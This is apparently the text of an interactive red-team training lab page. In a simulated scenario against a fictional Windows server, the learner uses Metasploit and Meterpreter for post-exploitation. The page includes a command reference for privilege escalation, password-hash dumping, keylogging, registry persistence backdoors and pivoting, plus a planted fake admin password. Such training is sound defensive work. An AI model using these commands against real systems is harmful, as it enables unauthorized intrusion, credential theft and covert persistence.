CyberSec Lab — Meterpreter Post-Exploitation

📸 screenshot.png — Captured from meterpreter session 1 ✕ Close

📊 Apex Systems — Q4 Financial Summary.xlsx — Microsoft Excel

Q4 Revenue: $4,218,400

Net Income: $2,114,200

Admin Pwd: ApexAdmin@2024!

CONFIDENTIAL — DO NOT DISTRIBUTE

🗑️

📁

🪟 Start

📊 Excel

🌐 Chrome

09:24 AM

⚠ Desktop screenshot captured — sensitive data visible: ApexAdmin@2024! found in open spreadsheet

🔴 ASSIGNMENT GOALS

Launch msfconsole and interact with the existing Meterpreter session.

Enumerate the target with sysinfo, getuid, and ps.

Escalate privileges to SYSTEM using getsystem.

Dump password hashes using hashdump.

Capture a screenshot and run the keylogger.

Establish persistence on the target.

Complete the pentest report and submit.

PHASE 1 — SESSION INTERACTION

💻

Terminal

📖

Reference Manual

📝

Notepad

📋

Pentest Report

⚠ CLASSIFIED — RED TEAM OPERATION

MISSION BRIEFING

Operation: Ghost Shell | Tool: Metasploit / Meterpreter

SCENARIO

Initial access to an Apex Systems Windows Server 2019 machine has been established via an unpatched vulnerability (MS17-010 EternalBlue). A Meterpreter session is waiting for you.

Your objective is to perform thorough post-exploitation — enumerate the system, escalate privileges to SYSTEM, dump password hashes, collect evidence via screenshot and keylogger, and establish persistence for continued access.

Document all findings in the pentest report.

OBJECTIVES

Run msfconsole, list sessions, interact with session 1.

Run sysinfo, getuid, getpid, and ps to enumerate the target.

Run getsystem to escalate from svcweb to NT AUTHORITY\SYSTEM.

Run hashdump to extract local account password hashes.

Run screenshot and keyscan_start + keyscan_dump to collect evidence.

Run persistence module to establish registry-based backdoor.

Fill out the Pentest Report and submit.

TOOLS

💻

Terminal

msfconsole, meterpreter commands, post modules

📖

Reference Manual

Meterpreter command reference and post module guide

📋

Pentest Report

Document and submit your post-exploitation findings

TARGET

🖥️

apex-srv-02

192.168.1.100 — Windows Server 2019 — Session 1 ready

Display Mode

TERMINAL — root@kali / msfconsole

Metasploit Lab Terminal — Kali Linux 2024.1

Type 'msfconsole' to launch Metasploit Framework.

root@kali:~#

REFERENCE MANUAL — METERPRETER

METASPLOIT CONSOLE

msfconsole — launch MSF
sessions — list active sessions
sessions -i 1 — interact with session 1
sessions -l — list all sessions
background — background current session

SYSTEM ENUMERATION

sysinfo — OS, hostname, arch
getuid — current user
getpid — current process ID
ps — list running processes
ipconfig — network interfaces
arp — ARP cache
route — routing table
env — environment variables

PRIVILEGE ESCALATION

getsystem — auto privesc to SYSTEM
getsystem -t 1 — named pipe impersonation
getsystem -t 3 — token duplication
getuid — verify new privilege level

CREDENTIAL DUMPING

hashdump — dump SAM hashes (needs SYSTEM)
run post/windows/gather/credentials/credential_collector
run post/multi/recon/local_exploit_suggester

EVIDENCE COLLECTION

screenshot — capture desktop screenshot
keyscan_start — start keylogger
keyscan_dump — dump captured keystrokes
keyscan_stop — stop keylogger
download <file> — download file from target
upload <file> — upload file to target

PERSISTENCE

# Two available modules (both work):
run post/windows/manage/persistence
run post/windows/manage/persistence_exe

# Options:
STARTUP=REGISTRY — registry run key (default)
STARTUP=SCHEDULER — scheduled task
STARTUP=STARTUPFOLDER — startup folder
SESSION=1

run persistence -h — see all options

PIVOTING & RECON

run post/multi/manage/shell_to_meterpreter
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_shares
run post/windows/gather/enum_applications
run post/multi/recon/local_exploit_suggester

HASH FORMAT

Hashdump output format:
username:RID:LM_hash:NTLM_hash:::

NTLM hashes can be cracked with Hashcat (mode 1000) or used directly in Pass-the-Hash attacks.

NOTEPAD — notes.txt

FileEditFormatView

Ln 1, Col 1UTF-8notes.txt

PENTEST REPORT — POST-EXPLOITATION FINDINGS

POST-EXPLOITATION FINDINGS REPORT

APEX SYSTEMS INC. — RED TEAM ENGAGEMENT — COMPLETE ALL FIELDS

SECTION 1 — TARGET SYSTEM

Target Hostname

Operating System

Initial Access User

Privilege Level Achieved

SECTION 2 — PRIVILEGE ESCALATION

Escalation Method Used

Was SYSTEM Achieved?

SECTION 3 — CREDENTIAL DUMPING

Number of Hashes Dumped

Admin Account Found

Credential Dump Method

SECTION 4 — PERSISTENCE & EVIDENCE

Persistence Method

Evidence Collected

SECTION 5 — RISK ASSESSMENT

Overall Risk Rating

Lateral Movement Possible?

Recommendations